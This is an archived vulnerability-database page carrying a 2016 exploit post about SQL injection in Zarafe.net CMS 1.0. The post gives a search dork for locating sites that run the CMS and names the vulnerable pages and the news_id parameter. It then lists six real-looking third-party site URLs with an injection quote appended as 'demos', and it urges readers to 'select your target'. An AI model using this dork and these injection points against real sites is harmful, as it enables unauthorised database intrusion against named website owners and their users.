Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormICG SECPACKETSTORM:136711
HistoryApr 18, 2016 - 12:00 a.m.

Zarafe.net CMS 1.0 SQL Injection

2016-04-1800:00:00
ICG SEC
packetstormsecurity.com
25
JSON
`Exploit Title : Zarafe.net CMS SQL Injection Vulnerability  
Exploit Author : Iran Cyber Security Group (ICSG)  
Discovered By : 0x3a  
Vendor HomePage : www.zarrafe.net  
Version : 1.0 (Q1)  
Date : 4 April, 2016  
Tested On : Internet Explorer , Win 98  
-----------------------------------------  
SQL Injection :  
For Finding Target First You Must Search The Dork And Select Your Target  
  
Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت"  
  
Vulnerable Page : news.php , news_view.php , product.php  
Vulnerable Variable : news_id=  
Demo :  
novinsystemfars.ir/news_view.php?news_id=30'  
pezeshkian-pharmacy.ir/news.php?news_id=3'  
sdshiraz.com/news.php?news_id=8'  
omidoor.com/products.php?product_category_code=12-15'  
meysam71.ir/news.php?khabar_id=10'  
etehadweb.ir/view_single_news.php?news_id=2  
  
  
[+][+][+][+][+][+][+]  
WWW.IRAN-CYBER.NET[+]  
[+][+][+][+][+][+][+]  
</0x3a>  
`
JSON